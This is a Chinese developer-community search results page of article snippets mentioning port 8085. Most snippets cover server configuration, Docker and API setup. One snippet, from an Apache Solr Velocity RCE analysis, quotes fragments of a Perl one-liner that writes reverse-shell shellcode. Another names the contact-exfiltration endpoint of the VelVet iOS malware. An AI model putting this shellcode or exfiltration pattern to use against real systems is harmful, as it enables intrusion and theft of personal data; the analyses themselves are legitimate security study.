首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏txy自动搬运

    某马2024SpringCloud微服务开发与实战 bug记录与微服务知识拆解(MybatisPlus、Docker、MQ、ES、Redis)第四章重制版

    ids=40305713537 HTTP/1.1 15:59:54:118 DEBUG 39592 --- [nio-8085-exec-1] com.hmall.api.client.CartClient : [CartClient#deleteCartItemByIds] user-info: 1 15:59:54:118 DEBUG 39592 --- [nio-8085-exec 15:59:54:235 DEBUG 39592 --- [nio-8085-exec-2] c.h.trade.mapper.OrderMapper.selectById : ==> Parameters , requestId = 268 我是UserInfoInterceptor 我将要把数据存储到线程中 userInfo = 1 16:02:00:026 DEBUG 39592 --- [nio-8085 : [ItemClient#queryItemByIds] date: Tue, 23 Jul 2024 08:02:00 GMT 16:02:00:033 DEBUG 39592 --- [nio-8085

    36310编辑于 2024-08-06
  • 来自专栏写代码和思考

    SRS(简单实时视频服务) 笔记(3)- 配置文件和Http回调

    when client connect to vhost/app, call the hook, on_connect http://host.docker.internal:8085 http://host.docker.internal:8085/api/v1/streams; on_unpublish http://host.docker.internal :8085/api/v1/streams; on_play http://host.docker.internal:8085/api/v1/sessions; :8085/api/v1/dvrs; on_hls http://host.docker.internal:8085/api/v1/hls; on_hls_notify http://host.docker.internal:8085/api/v1/hls/[app]/[stream]/[ts_url][param]; } 事件:发生该事件时,即回调指定的HTTP

    3.2K30发布于 2021-05-11
  • 来自专栏全栈程序员必看

    一些免费的代理服务器「建议收藏」

    24.60.145.147:8085 24.74.183.71:8085 24.116.134.200:80 24.186.243.203:8085 24.187.73.239:8085 24.189.95.126:8085 64.53.147.144:8085 64.73.37.166:80 65.124.174.48:80 66.60.219.153:8085 67.82.144.94 :8085 67.162.53.49:8085 68.33.131.54:8085 68.49.66.227:8085 68.58.140.37:8085 68.111.121.108:8085 69.114.246.213:8085 69.181.72.3:9090 69.243.217.64:8085 69.255.220.42:8085 71.56.103.99:8085 71.199.138.154 :8085 71.235.34.19:7212 72.12.156.45:8085 72.196.11.73:8085 72.213.53.249:8085 72.218.72.243:8085

    7K11编辑于 2022-08-26
  • 来自专栏微机控制技术

    第二讲 80X86微处理器

    80X86微处理器系列概况(1)从8080/8085到8086 ﹡8086是16微处理器,内部及对外有16位数据通路,8080/8085只有8位。 ﹡8086寻址空间1MB,8080/8085为64KB。 ﹡8086有一个初级流水线结构,内部操作与对外操作具有并行性,8085无。 ﹡8086是个里程碑。

    35510编辑于 2024-11-15
  • 来自专栏Java程序员那些事

    SpringBoot2.0之CORS跨域配置并保持登录

    前端有自己的服务器来访问页面比如http://127.0.0.1:8080,然后通过网络库(Axios)来实现Ajax请求后端服务器http://127.0.0.1:8085来实现数据的展现。 比如: import axios from 'axios'; //创建实例 const instance = axios.create({ baseURL: 'http://127.0.0.1:8085 Content-Type': 'application/x-www-form-urlencoded' } }); 此时就会报如下错误 Failed to load http://127.0.0.1:8085 /blog/category/list Request Method:GET Status Code:200 Remote Address:127.0.0.1:8085 Referrer Policy 前端配置: //创建实例 const instance = axios.create({ baseURL: 'http://127.0.0.1:8085', timeout: 10000,

    1.7K30发布于 2020-05-07
  • 来自专栏ECS服务器

    OSSRS搭建rtmp推流服务器

    /v1/clients http://localhost:8085/api/v1/clients; on_publish http://127.0.0.1:8085/api/v1 http://localhost:8085/api/v1/streams; on_play http://127.0.0.1:8085/api/v1/sessions http://localhost:8085/api/v1/sessions; on_stop http://127.0.0.1:8085/api/v1/sessions http://localhost:8085/api/v1/sessions; on_dvr http://127.0.0.1:8085/api/v1/dvrs http ://localhost:8085/api/v1/dvrs; on_hls http://127.0.0.1:8085/api/v1/hls http://localhost:

    5.6K42编辑于 2023-04-18
  • 来自专栏跟牛老师一起学WEBGIS

    Geoserver的RESTful接口使用

    :8085/geoserver/rest/workspaces/lzugis.json 添加工作区 POST: http://localhost:8085/geoserver/rest/workspaces GET: http://localhost:8085/geoserver/rest/workspaces/lzugis/datastores/lzugis.json 添加数据存储 - shp文件 图层 获取所有图层 GET: http://localhost:8085/geoserver/rest/layers 获取工作区下的所有图层 GET: http://localhost:8085 样式 获取所有样式 GET: http://localhost:8085/geoserver/rest/styles 获取工作区下的所有图层 GET: http://localhost:8085 name=test POST: (指定工作区)http://localhost:8085/geoserver/rest/workspaces/lzugis/styles?

    93100编辑于 2024-05-24
  • 来自专栏数据湖

    安装Ambari和HDP

    由于AWS中国的EC2服务器没有开放80和8080端口,我们将Http服务的端口改为了8085,Ambari Web服务的端口改成了8086端口。 ,并修改为 ambari.repo [ambari-2.6.1.5] name=ambari Version - ambari-2.6.1.5 baseurl=http://52.83.64.220:8085 /ambari/centos7/2.6.1.5-3 gpgcheck=1 gpgkey=http://52.83.64.220:8085/ambari/centos7/2.6.1.5-3/RPM-GPG-KEY /HDP/centos7/2.6.4.0-91 gpgcheck=1 gpgkey=http://52.83.64.220:8085/HDP/centos7/2.6.4.0-91/RPM-GPG-KEY 1 enabled=1 [HDP-UTILS-1.1.0.22-repo-1] name=HDP-UTILS-1.1.0.22-repo-1 baseurl=http://52.83.64.220:8085

    3.4K33发布于 2020-10-15
  • 来自专栏全栈程序员必看

    超简单部署使用Maven私库 Nexus

    docker 拉取:docker pull docker.io/sonatype/nexus3 运行容器:docker run -d -p 8085:8081 --name nexus docker.io /sonatype/nexus,映射到本地的8085端口,等一会儿就好了,用docker ps -a命令查看 访问地址:http://192.64.23.111:8085/ 通过Log in --> <url>http://192.64.23.111:8085/repository/maven-public/</url> </mirror> </mirrors> <id>nexus</id> <name>Nexus</name> <url>http://192.64.23.111:8085 <id>nexus</id> <name>Nexus</name> <url>http://192.64.23.111:8085

    1.5K10编辑于 2022-09-09
  • 来自专栏陶然同学博客

    【Docker】部署若依项目——保姆级教程亲测

    urandom","-jar","/app.jar"] #ENTRYPOINT ["nohup","java","-jar","/data/cat/ruoyi-admin.jar","&"] #暴露8085 端口 EXPOSE 8085 步骤6:制作镜像 启动容器 #构建镜像 docker build -t ruoyi:1.0 . #查看镜像 docker images #启动容器 docker run -d --name ruoyi -p 8085:8085 ruoyi:1.0 步骤7:访问 2.前端打包 步骤1:修改端口 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_pass http://192.168.243.xxx:8085

    8.3K12编辑于 2023-12-06
  • 云服务器中如何查看服务器具体运行哪些服务

    Java 应用 (8085, 8089, 8084, 8088, 8060, 8065)。 如何进一步根据端口号查看信息使用命令lsof -i :8085上述命令解释:lsof (List Open Files): 列出系统中打开的文件,包括网络连接、普通文件、库文件等。 -i :8085: 过滤出所有监听或正在使用 8085 端口的进程。 :8085 测试耗时也可以使用命令:ps -aux | grep 8085运行结果展示:上述结果解读:由于这块借助AI解读,此处展示AI给我生成的解读示例:root 19601 5.2 1.2 Sl 10:03 0:10 /usr/bin/java -Xms1g -Xmx2g -jar myapp.jar --server.port=8085如何查看8085这个是否是web服务可以使用命令

    1.8K10编辑于 2025-03-14
  • 来自专栏AllTests软件测试

    性能-Netdata

    方式二:将访问端口添加到防火墙规则里(例如访问的端口为8085) 1、输入添加端口命令firewall-cmd --zone=public --add-port=8085/tcp --permanent 3、再次访问http://192.168.226.133:8085/地址就可以了(注意:默认的端口19999修改为8085)。 如图所示:将# default port = 19999修改为default port = 8085(注意:将前面的#号去掉) 3、依次输入停止服务(systemctl stop netdata)、启动服务 4、默认端口19999改为8085,所有访问http://192.168.226.133:8085/地址即可。 - End -

    2.7K20编辑于 2022-07-22
  • 来自专栏程序技术知识

    go :gin 如果绑定查询字符串

    "` } func main() { route := gin.Default() route.GET("/testing", startPage) route.Run(":8085 log.Println(person.Address) } c.String(200, "Success") } 测试 ->curl -X GET "localhost:8085 name=appleboy&address=xyz&birthday=1992-03-15" Success-> ->curl -X GET localhost:8085/testing --data

    54531编辑于 2022-07-25
  • 来自专栏写代码和思考

    自建Docker私有仓库Harbor

    2、按实际修改端口号,我这里改成了8085 2.3 可选配置 HTTPS 方式访问 我这里只用用 HTTP 访问了,未配置证书,若要配置HTTPS方式 请参考 https://blog.csdn.net /catoop/article/details/127638997 2.4 Web 登录和修改密码 (1) 打开 https://你的域名或者IP:8085 ,登录进去可以。 参考 https://blog.csdn.net/zlbdmm/article/details/121614632 docker login devops.deltac.com.cn:8085 输入账号 输入密码 上传和下载镜像 # 标识一个 tag docker tag dms-gateway:last devops.deltac.com.cn:8085/test/dms-gateway:last :8085/test/dms-gateway:last # 再次下载远程镜像 docker pull devops.deltac.com.cn:8085/test/dms-gateway:last 四

    2.1K60编辑于 2023-03-15
  • 来自专栏陶士涵的菜地

    Docker部署-唯一客服系统文档中心

    /app RUN chmod -R 777 /app WORKDIR /app # 开放 8085 端口 EXPOSE 8085 # 执行脚本 CMD [". /kefu", "server", "-p", "8085"] 打包镜像,镜像名称为 kefu docker build -t kefu . 运行镜像 docker run -v /www/docker/config:/app/config  -p 8085:8085 kefu 宿主机目录的 /www/docker/config目录下需要创建好数据库配置文件

    51620编辑于 2023-05-14
  • 来自专栏Django Scrapy

    常用颜色RGB编码

    1 '#7cb5ec', #7cb5ec 2 '#434348', #434348 3 '#90ed7d', #90ed7d 4 '#f7a35c', #f7a35c 5 '#8085e9 ', #8085e9 6 '#f15c80', #f15c80 7 '#e4d354', #e4d354 8 '#8085e8', #8085e8 9 '#8d4653

    1.8K40发布于 2018-11-23
  • 来自专栏凯哥Java

    再记frp配置

    使用的frp:frp_0.21.0_linux_amd64 一:服务端配置 [common] #虚拟主机穿透监听端口(指http与https的访问端口) vhost_http_port = 8085 # type = tcp #local_port = 3389 #remote_port = 7777 [ok] type = http local_ip = 127.0.0.1 local_port = 8085        80;     server_name *.fanyi.youtest.com;     location ~^/ {              proxy_pass http://$host:8085 (gif|jpg|png|bmp|swf|css|js)$ {  proxy_pass http://$host:8085;                  expires 30d;          80;     server_name *.frptest.nnn.com;       location ~^/ {              proxy_pass http://127.0.0.1:8085

    1.5K50发布于 2019-06-28
  • 来自专栏信安之路

    Apache Solr Velocity RCE 真的 getshell 了吗

    /;print $FH pack q/H*/, q/b06689e1cd80975b68c0a801d2680200115c89e16a665850515789e143cd8085/ or die qq /;print $FH pack q/H*/, q/c079194e743d68a2000000586a006a0589e331c9cd8085c079bdeb27b207b900/ or die qq /;print $FH pack q/H*/, q/10000089e3c1eb0cc1e30cb07dcd8085c078105b89e199b60cb003cd8085c078/ or die qq /;print $FH pack q/H*/, q/b06689e1cd80975b68c0a801d2680200115c89e16a665850515789e143cd8085/ or die qq /;print $FH pack q/H*/, q/10000089e3c1eb0cc1e30cb07dcd8085c078105b89e199b60cb003cd8085c078/ or die qq

    2K10发布于 2019-11-14
  • 来自专栏Chasays

    使用 pyhttptest 轻松测试 REST API

    : List all users", "verb": "GET", "endpoint": "api/v1/users", "host": "http://localhost:8085 Add a new user", "verb": "POST", "endpoint": "api/v1/users", "host": "http://localhost:8085 "verb": "PUT", "endpoint": "api/v1/users/XeEsscGqweEttXsgY", "host": "http://localhost:8085 "verb": "DELETE", "endpoint": "api/v1/users/XeEsscGqweEttXsgY", "host": "http://localhost:8085

    1.4K20发布于 2020-02-15
  • 来自专栏FreeBuf

    VelVet病毒分析报告:针对韩国用户的iOS应用

    图1-1 请求通讯录权限 随后APP获取用户通讯录信息并上传至服务器: http://redvios.com:8085/JYSystem/restInt/collect/postData。 ? 图1-6 对数据进行格式化 传入的url拼接上服务器地址http://redvios.com:8085/就是完整的url地址: http://redvios.com:8085/JYSystem/restInt

    71910发布于 2021-01-25
领券